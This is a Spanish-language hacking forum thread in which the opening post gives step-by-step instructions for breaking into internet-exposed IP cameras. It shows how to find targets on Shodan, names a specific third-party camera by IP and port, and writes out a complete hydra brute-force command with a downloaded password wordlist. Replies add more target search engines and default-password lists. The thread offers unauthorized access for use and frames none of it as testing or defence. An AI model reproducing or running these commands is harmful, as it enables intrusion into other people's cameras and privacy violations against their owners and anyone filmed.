Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Como entrar a una camara web con fuerza bruta

  • 3 Respuestas
  • 5079 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado MrKrypton

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 1
  • Un Soldado Da Tiros Y Un Hacker Da Enter
    • Ver Perfil
    • Email
« en: Febrero 26, 2018, 04:06:32 pm »
Nos ha pasado que hemos puesto alguna IP y nos mande a algún servidor web que trae admin y contraseña, Navegamos en google y no aparece nada relacionado, Lo que haremos es hacer un ataque de fuerza bruta desde kali linux

https://www.shodan.io/search?query=ip+cameras

Entraremos ala pagina web, Nos registramos y en el buscador ponemos ip cameras y despues de buscar la camara que queramos entraremos, En mi caso me meti a esta http://46.237.76.163:8880/ La IP Es: 46.237.76.163 Se esta corriendo en el puerto:8880

Abrimos una nueva ventana y ponemos: wordlist camera github, abriremos la de jeanphorn luego descargamos o la clonamos con este comando: "git clone https://github.com/jeanphorn/wordlist.git"

Abrimos una terminal y ponemos hydra, nos saldran los comandos, Este es un ejemplo de como seria el comando: hydra -s (Puerto) 8880 -l admin -P (La Wordlist osea el txt donde vienen la contraseña) -e ns -t 16 + 46.237.76.163 (la ip) http

Quedaria asi el comando: hydra -s 8880 -l admin -P /root/Desktop/wordlist-master/passlist.txt -e ns -t 16 46.237.76.163 http

Empezara a sacar su contraseña y solo es de ir probando



Psd: Soy nuevo en el foro espero que les haya servido  ;D

Desconectado ghostshadow666

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    0%
  • Reputación 0
  • All warfare is based on deception
    • Ver Perfil
« Respuesta #1 en: Febrero 26, 2018, 07:06:39 pm »
Gracias por el aporte también puedes usar FOFA.SO. Recuerda que debes registrarte en Shodan para al menos tengas 3 páginas de búsqueda , si no pagar los 50 pavos , recomiendo a la hora de buscar por defecto  en cámaras

https://ipvm.com/reports/ip-cameras-default-passwords-directory

lo Importante es buscar  marcas reconocidas .

« Última modificación: Febrero 27, 2018, 01:10:06 am por Gabriela »

Desconectado Eduardo Krad

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #2 en: Febrero 27, 2018, 11:59:47 am »
Interesante.. nunca se me habría ocurrido hacer brute force en una camara web jajaja normalmente hago eso con los admin panel de una web.

Desconectado matzcontreras

  • *
  • Underc0der
  • Mensajes: 40
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Noviembre 23, 2018, 06:30:13 pm »
muy bueno, tambien he de probar con  burp suite!

 

¿Te gustó el post? COMPARTILO!



Como usar Google DoSear contra sitios web alojados en grandes dominios

Iniciado por Pr0ph3t

Respuestas: 1
Vistas: 3602
Último mensaje Mayo 04, 2012, 12:12:50 am
por Cronos
[GUIA]Como protegerse del doxing y proteger tu informacion personal en telegram

Iniciado por Psico

Respuestas: 5
Vistas: 2210
Último mensaje Julio 07, 2019, 07:05:50 am
por hielasangre
¿Cómo eché a la gente de mi red WiFi para aumentar mi velocidad de internet?

Iniciado por puntoCL

Respuestas: 6
Vistas: 2112
Último mensaje Septiembre 24, 2019, 09:56:53 pm
por efrainvaldivieso
Como controlar el trafico aereo gracias al hacking de buscadores

Iniciado por Rootkit_Pentester

Respuestas: 7
Vistas: 5505
Último mensaje Abril 22, 2017, 04:38:16 pm
por GotKiller_22
Como tomar control de un dispositivo Android en menos de 1 minuto

Iniciado por ANTRAX

Respuestas: 24
Vistas: 27548
Último mensaje Junio 29, 2019, 10:40:59 pm
por Psico